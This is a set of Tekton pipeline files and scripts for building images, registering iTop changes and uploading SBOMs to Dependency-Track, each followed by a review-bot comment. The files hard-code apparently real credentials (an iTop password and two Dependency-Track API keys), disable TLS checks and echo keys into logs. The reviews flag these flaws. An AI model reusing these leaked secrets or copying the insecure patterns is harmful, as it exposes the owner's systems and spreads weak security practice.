name: register-change
spec:
params:
- name: project
type: string
- name: git-revision
type: string
steps:
- name: register-change
image: apteno/alpine-jq
script: |
ITOP_URL="https://itop-dev.allarddcs.nl"
ITOP_USER="tekton"
ITOP_PWD="Itop01@@@"
ORGANIZATION="0001"
TITLE="Container $(params.project).$(params.git-revision) "
DESCRIPTION="Container $(params.project).$(params.git-revision) created"
CALLER="tekton"
COMMENT="new version of container $(params.project) has been pushed"
CHANGE="RoutineChange"
# Let's create the ticket via the REST/JSON API
JSON_DATA='{"operation":"core/create", "class":"'"${CHANGE}"'", "fields": {"org_id":"'"${ORGANIZATION}"'", "title":"'"$TITLE"'", "description":"'"$DESCRIPTION"'"}, "caller": "'"$CALLER"'", "comment": "'"$COMMENT"'"}'
RESULT=`wget -q --post-data='auth_user='"${ITOP_USER}"'&auth_pwd='"${ITOP_PWD}"'&json_data='"${JSON_DATA}" --no-check-certificate -O - "${ITOP_URL}/webservices/rest.php?version=1.0"`
if echo "$RESULT" | grep "created"
then
echo "Change created successfully"
echo "$RESULT"
else
echo "ERROR: failed to create change"
echo "$RESULT"
exit 1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true
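Review bot: The iTop service-account password `Itop01@@@` is hard-coded in the step script; move it (and `ITOP_USER`) into a Secret exposed through `env`/`valueFrom.secretKeyRef` and rotate it. `--no-check-certificate` disables TLS verification for the request that carries that password in the POST body, so an on-path attacker can capture it — drop the flag and trust the internal CA. `$(params.project)` and `$(params.git-revision)` are substituted as text into the script and then concatenated into JSON without escaping, so a value containing `"` or `'` breaks the JSON or the shell; pass them as `env` and build the payload with the `jq` the `apteno/alpine-jq` image already provides (`jq -n --arg title "$TITLE" ...`), and URL-encode the `--post-data` fields.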


@@ -0,0 +1,21 @@
#!/bin/bash
ITOP_URL="http://itop.alldcs.nl"
ITOP_USER="tekton"
ITOP_PWD="Itop01@@@"
ORGANIZATION="0001"
TITLE="Containerchange"
DESCRIPTION="Container created"
CALLER="0001"
COMMENT="new version of container olproperties has been pushed"
CHANGE="RoutineChange"
# Let's create the ticket via the REST/JSON API
JSON_DATA='{"operation":"core/create", "class":"'"${CHANGE}"'", "fields": {"org_id":"'"${ORGANIZATION}"'", "title":"'"$TITLE"'", "description":"'"$DESCRIPTION"'"}, "caller": "'"$CALLER"'", "comment": "'"$COMMENT"'"}'
RESULT=`wget -q --post-data='auth_user='"${ITOP_USER}"'&auth_pwd='"${ITOP_PWD}"'&json_data='"${JSON_DATA}" --no-check-certificate -O - "${ITOP_URL}/webservices/rest.php?version=1.0"`
echo "$RESULT" | jq '.key'
if echo "$RESULT" | grep "created"
then
echo "Change created successfully"
else
echo "ERROR: failed to create change"
echo $RESULT
fi
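Review bot: The same iTop credential `Itop01@@@` as in the Tekton task is hard-coded here and posted to a plain `http://` URL, so the password travels in clear text; use `https://` and read the password from the environment or a `.netrc` outside the repo. `--no-check-certificate` is then also unnecessary. `wget` returns non-zero on HTTP errors but that status is ignored — the script only greps for `created` and the `else` branch exits 0, so callers cannot tell a failed change registration from a successful one; add `exit 1` in the failure branch.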


@@ -0,0 +1,3 @@
FROM ubuntu
RUN apt update && apt upgrade -y
RUN apt install curl -y
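Review bot: `FROM ubuntu` floats on `latest`, so the image published as `harbor-dev.allarddcs.nl/allard/curl:1.0` is not reproducible; pin a release tag and ideally a digest (`FROM ubuntu:24.04@sha256:...`). Running `apt update` and `apt install` in separate layers lets a cached `update` layer pair with a fresh `install`, yielding stale package lists; combine them, skip recommends and clean up in one layer: `RUN apt-get update && apt-get install -y --no-install-recommends curl ca-certificates && rm -rf /var/lib/apt/lists/*`. The image runs as root; add a `USER` for a tool that only makes HTTP calls.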



@@ -0,0 +1,50 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
steps:
- computeResources: {}
image: allardkrings/ubuntu-curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
if
curl -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: odt_UPC8l0R9vzQILZIphSoK15J4u4Ns3HEy" \
-F "autoCreate=true" \
-F "projectName=olproperties" \
-F "projectVersion=1.1" \
-F "bom=@olproperties.sbom.json" \
"https://deptracka-dev.allarddcs.nl/api/v1/bom" \
| grep "token"
then
echo "sbom uploaded succesfully"
else
echo odt_UPC8l0R9vzQILZIphSoK15J4u4Ns3HEy
echo olproperties
echo 1.1
echo olproperties.sbom.json
ls
echo "upload sbom failed"
exit -1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true
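Review bot: The step ignores its own `deptrack-apiKey`, `deptrack-projectName`, `deptrack-projectVersion` and `sbom` params and instead hard-codes the API key `odt_UPC8l0R9...` and project values, then prints the key in the failure branch (`echo odt_UPC8l0R9...`). Revoke that key, read the value from an `env` backed by a Secret (so it is neither in the manifest nor in the TaskRun status), and never echo it. `exit -1` is not a valid exit status (255 in bash, an error in dash); use `exit 1`. `allardkrings/ubuntu-curl:1.0` is an unpinned personal Docker Hub image running as root.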


@@ -0,0 +1,56 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
- description: The URL of the DepTrack API
name: deptrack-url
type: string
steps:
- computeResources: {}
image: harbor-dev.allarddcs.nl/allard/curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
# Run curl command and capture the output and error messages
response=$(curl -v -k -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $(params.deptrack-apiKey)" \
-F "autoCreate=true" \
-F "projectName=$(params.deptrack-projectName)" \
-F "projectVersion=$(params.deptrack-projectVersion)" \
-F "bom=@$(params.sbom)" \
"$(params.deptrack-url)/api/v1/bom" 2>&1)
# Check the response for a specific token or success message
if echo "$response" | grep -q "token"; then
echo "SBOM uploaded successfully"
else
# Print the error response from curl to diagnose the failure
echo $(params.deptrack-url)
echo $(params.deptrack-apiKey)
echo $(params.deptrack-projectName)
echo $(params.deptrack-projectVersion)
echo $(params.sbom)
echo "Failed to upload SBOM. Response from curl:"
echo "$response"
exit 1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true
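Review bot: `curl -v ... 2>&1` captures the verbose trace — which includes the outgoing `X-API-Key:` request header — into `$response`, and the failure branch prints both `$response` and `echo $(params.deptrack-apiKey)`, so the Dependency-Track API key is written to the TaskRun log twice on any error. Drop `-v`, remove the `echo` of the key, and pass the key through an `env` entry with `valueFrom.secretKeyRef` instead of a param (params are persisted in the run's spec and status). `-k` disables TLS verification for the request carrying that key; trust the internal CA instead. This is one of three Tasks named `push-sbom` in namespace `default` in this commit — whichever is applied last silently wins.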


@@ -0,0 +1,50 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: push-sbom
namespace: default
spec:
params:
- description: name of the image
name: image-reference
type: string
- description: The name of sbom
name: sbom
type: string
- description: The deptrack-authorisation-key to upload the sbom, put in secret
name: deptrack-apiKey
type: string
- description: The name of the deptrack-project
name: deptrack-projectName
type: string
- description: The version of the deptrack-project
name: deptrack-projectVersion
type: string
- description: The URL of the DepTrack API
name: deptrack-url
type: string
steps:
- computeResources: {}
image: harbor-dev.allarddcs.nl/allard/curl:1.0
name: push-sbom
script: |
#!/usr/bin/env bash
if curl -k -X POST \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $(params.deptrack-apiKey)" \
-F "autoCreate=true" \
-F "projectName=$(params.deptrack-projectName)" \
-F "projectVersion=$(params.deptrack-projectVersion)" \
-F "bom=@$(params.sbom)" \
"$(params.deptrack-url)/api/v1/bom" \
| grep "token"
then
echo "sbom uploaded successfully"
else
echo "Failed to upload sbom"
exit -1
fi
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true
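Review bot: `curl -k` disables certificate verification for a request that carries the Dependency-Track API key in `X-API-Key`, so the key can be captured on path; remove `-k` and mount the CA if `deptrack-url` presents an internal certificate. `exit -1` is out of range for a POSIX exit status; use `exit 1`. `image-reference` is declared but never used by the step, and the key still arrives as a plain param rather than from a Secret.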


@@ -0,0 +1,30 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: syft-push-pipeline-run-
spec:
pipelineRef:
name: generate-and-push-sbom
params:
- name: image-reference
value: harbor-dev.allarddcs.nl/allard/olproperties:1.0
- name: deptrack-url
value: http://deptrack-apiserver.deptrack.svc.cluster.local:8080
- name: deptrack-projectName
value: olproperties
- name: deptrack-projectVersion
value: 1.1
- name: deptrack-apiKey
value: odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
- name: deptrack-options
value:
- ""
workspaces:
- name: shared-data
volumeClaimTemplate:
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
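Review bot: The Dependency-Track API key `odt_BRpq4el8...` is committed as a plain `value` (the same key appears in the cosign PipelineRun and a shell script in this commit); revoke it and supply it to the task from a Secret — a Secret-backed workspace or an `env` in the Task — rather than as a PipelineRun param, which is persisted in the run's status. `deptrack-options` is passed as an array holding one empty string but is never consumed by any task in `generate-and-push-sbom`.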


@@ -0,0 +1,55 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: generate-and-push-sbom
spec:
description: |
This pipeline generates an sbom with syft and pushes the sbom to deptrack
params:
- name: image-reference
type: string
- name: deptrack-url
type: string
- name: deptrack-projectName
type: string
- name: deptrack-projectVersion
type: string
- name: deptrack-options
type: array
- name: deptrack-apiKey
type: string
workspaces:
- name: shared-data
tasks:
- name: syft
taskRef:
name: syft
params:
- name: ARGS
value:
- $(params.image-reference)
- --output
- cyclonedx-json=./$(params.deptrack-projectName).sbom.json
workspaces:
- name: source-dir
workspace: shared-data
- name: push-sbom
runAfter: ["syft"]
taskref:
name: push-sbom
params:
- name: deptrack-url
value: $(params.deptrack-url)
- name: deptrack-apiKey
value: $(params.deptrack-apiKey)
- name: deptrack-projectName
value: $(params.deptrack-projectName)
- name: deptrack-projectVersion
value: $(params.deptrack-projectVersion)
- name: sbom
value: $(params.deptrack-projectName).sbom.json
workspaces:
- name: source-dir
workspace: shared-data
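Review bot: The `push-sbom` task uses `taskref` (lowercase) while `syft` above uses `taskRef`; Tekton only knows `taskRef`, so the second task is invalid as written. `deptrack-apiKey` is threaded through as a plain string param, which means every PipelineRun records the key in its spec; bind a Secret to a workspace (or an `env` in the Task) and read it from there. `image-reference` is handed straight to `syft`, which pulls the image from the registry — passing a digest rather than `:1.0` would make the SBOM attest exactly the image that gets signed.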


@@ -0,0 +1,24 @@
#!/usr/bin/env bash
export deptrackapiKey=odt_BRpq4el8T0XqdeunYMnefniaS0n8Yxd8
export deptrackprojectName=olproperties
export deptrackprojectVersion=1.1
export sbom=olproperties.sbom.json
if
curl -X POST "https://deptracka-dev.allarddcs.nl/api/v1/bom" \
-H 'Content-Type: multipart/form-data; boundary=__X_BOM__' \
-H "X-API-Key: $deptrackapiKey" \
-F "autoCreate=true" \
-F "projectName=$deptrackprojectName" \
-F "projectVersion=$deptrackprojectVersion" \
-F "bom=@olproperties.sbom.json" \
| grep "token"
then
echo "sbom uploaded succesfully"
else
echo $deptrackapiKey
echo $deptrackprojectName
echo $deptrackprojectVersion
echo $sbom
echo "upload sbom failed"
exit -1
fi
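Review bot: The Dependency-Track API key is hard-coded in `export deptrackapiKey=odt_BRpq...` and echoed on failure; load it from the environment or a file outside the repository and never print it. `$sbom` is defined but the upload uses the literal `olproperties.sbom.json`, so changing the variable has no effect. `exit -1` is not a valid POSIX exit status; use `exit 1`.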

dev/tekton/tasks/syft-task.yaml Executable file

@@ -0,0 +1,27 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
labels:
app.kubernetes.io/version: "0.1"
name: syft
spec:
description: CLI tool and library for generating a Software Bill of Materials from
container images and filesystems
params:
- description: The Arguments to be passed to Syft command.
name: ARGS
type: array
- default: docker.io/anchore/syft:v0.93.0
description: Syft image to be used
name: SYFT_IMAGE
type: string
steps:
- args:
- $(params.ARGS)
computeResources: {}
image: $(params.SYFT_IMAGE)
name: syft
workingDir: $(workspaces.source-dir.path)
workspaces:
- name: source-dir
optional: true
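Review bot: `$(params.ARGS)` references an array param without `[*]`; Tekton accepts both forms for a whole-array expansion, but its documented form — and the one the `curl` Task in this commit uses — is `$(params.ARGS[*])`, so align them. The default `docker.io/anchore/syft:v0.93.0` is pinned by tag only, whereas the `curl` Task pins by digest; pin syft by digest too, since it reads every layer of the image it scans and feeds the result into Dependency-Track.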


@@ -0,0 +1,93 @@
apiVersion: tekton.dev/v1
kind: Task
metadata:
name: buildah
namespace: default
spec:
description: |-
Buildah task builds source into a container image and then pushes it to a container registry.
Buildah Task builds source into a container image using Project Atomic's Buildah build tool.It uses Buildah's support for building from Dockerfiles, using its buildah bud command.This command executes the directives in the Dockerfile to assemble a container image, then pushes that image to a container registry.
params:
- description: Reference of the image buildah will produce.
name: IMAGE
type: string
- default: quay.io/buildah/stable:v1.23.3
description: The location of the buildah builder image.
name: BUILDER_IMAGE
type: string
- default: overlay
description: Set buildah storage driver
name: STORAGE_DRIVER
type: string
- default: ./Dockerfile
description: Path to the Dockerfile to build.
name: DOCKERFILE
type: string
- default: .
description: Path to the directory to use as context.
name: CONTEXT
type: string
- default: "true"
description: Verify the TLS on the registry endpoint (for push/pull to a non-TLS
registry)
name: TLSVERIFY
type: string
- default: oci
description: The format of the built container, oci or docker
name: FORMAT
type: string
- default: ""
description: Extra parameters passed for the build command when building images.
name: BUILD_EXTRA_ARGS
type: string
- default: ""
description: Extra parameters passed for the push command when pushing images.
name: PUSH_EXTRA_ARGS
type: string
- default: "false"
description: Skip pushing the built image
name: SKIP_PUSH
type: string
results:
- description: Digest of the image just built.
name: IMAGE_DIGEST
type: string
- description: Image repository where the built image would be pushed to
name: IMAGE_URL
type: string
steps:
- computeResources: {}
image: $(params.BUILDER_IMAGE)
name: build
script: |
[[ "$(workspaces.sslcertdir.bound)" == "true" ]] && CERT_DIR_FLAG="--cert-dir $(workspaces.sslcertdir.path)"
[[ "$(workspaces.dockerconfig.bound)" == "true" ]] && export DOCKER_CONFIG="$(workspaces.dockerconfig.path)"
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) bud \
$(params.BUILD_EXTRA_ARGS) --format=$(params.FORMAT) \
--tls-verify=$(params.TLSVERIFY) --no-cache \
-f $(params.DOCKERFILE) -t $(params.IMAGE) $(params.CONTEXT)
[[ "$(params.SKIP_PUSH)" == "true" ]] && echo "Push skipped" && exit 0
buildah ${CERT_DIR_FLAG} --storage-driver=$(params.STORAGE_DRIVER) push \
$(params.PUSH_EXTRA_ARGS) --tls-verify=$(params.TLSVERIFY) \
--digestfile /tmp/image-digest $(params.IMAGE) \
docker://$(params.IMAGE)
cat /tmp/image-digest | tee $(results.IMAGE_DIGEST.path)
echo -n "$(params.IMAGE)" | tee $(results.IMAGE_URL.path)
securityContext:
privileged: true
volumeMounts:
- mountPath: /var/lib/containers
name: varlibcontainers
workingDir: $(workspaces.source.path)
volumes:
- emptyDir: {}
name: varlibcontainers
workspaces:
- name: source
- name: sslcertdir
optional: true
- description: An optional workspace that allows providing a .docker/config.json
file for Buildah to access the container registry. The file should be placed
at the root of the Workspace with name config.json.
name: dockerconfig
optional: true
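Review bot: This is a second `buildah` Task in namespace `default` (the other copy in this commit carries exported live-object metadata); applying both leaves whichever is applied last, so keep one. The `build` step runs `privileged: true`, handing the build container full node capabilities; if rootless buildah with `--isolation chroot` and a `/dev/fuse` device works on this cluster, prefer it, otherwise schedule builds on an isolated node pool and document why privileged is required. `$(params.BUILD_EXTRA_ARGS)`, `$(params.PUSH_EXTRA_ARGS)`, `$(params.IMAGE)` and the other params are substituted as text into the shell script, so any param value is shell code — route params through `env:` and reference them quoted inside `script`.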


@@ -0,0 +1,7 @@
apiVersion: tekton.dev/v1beta1
kind: PipelineRun
metadata:
generateName: timestamp-
spec:
pipelineRef:
name: timestamp


@@ -0,0 +1,11 @@
apiVersion: tekton.dev/v1beta1
kind: Pipeline
metadata:
name: timestamp
spec:
workspaces:
- name: shared-workspace
tasks:
- name: timestamp
taskRef:
name: timestamp
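Review bot: `shared-workspace` is declared on the Pipeline but never passed to the `timestamp` task, and the `timestamp-` PipelineRun in this commit binds no workspaces, so the run is rejected for a missing required workspace. Either remove the `workspaces` declaration or mark it `optional: true`.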


@@ -0,0 +1,21 @@
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
name: timestamp
spec:
results:
- name: timestamp
steps:
- name: timestamp
image: busybox
script: |
#!/bin/sh
# Get the current date-time in YYYYMMDD_HHMMSS format
TIMESTAMP=$(date +"%d%h%m%s")
echo $TIMESTAMP > $(results.timestamp.path)
echo "TIMESTAMP= " $TIMESTAMP
if [[ "$TIMESTAMP" =~ ^[a-zA-Z0-9_.-]+$ ]]; then
echo "TIMESTAMP is valid"
else
echo "TIMESTAMP is invalid"
fi
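Review bot: `date +"%d%h%m%s"` yields day, abbreviated month name, minute and Unix epoch seconds (something like `23Nov581763...`), not the `YYYYMMDD_HHMMSS` the comment promises; use `TIMESTAMP=$(date +"%Y%m%d_%H%M%S")`. The `[[ ... =~ ... ]]` regex test is bash syntax, but the script declares `#!/bin/sh` on `busybox`, whose ash does not implement `=~`, so the validation errors or fails instead of checking anything — and it only prints, never exits non-zero. `echo $TIMESTAMP > $(results.timestamp.path)` writes a trailing newline into the result; use `printf '%s' "$TIMESTAMP" > $(results.timestamp.path)`.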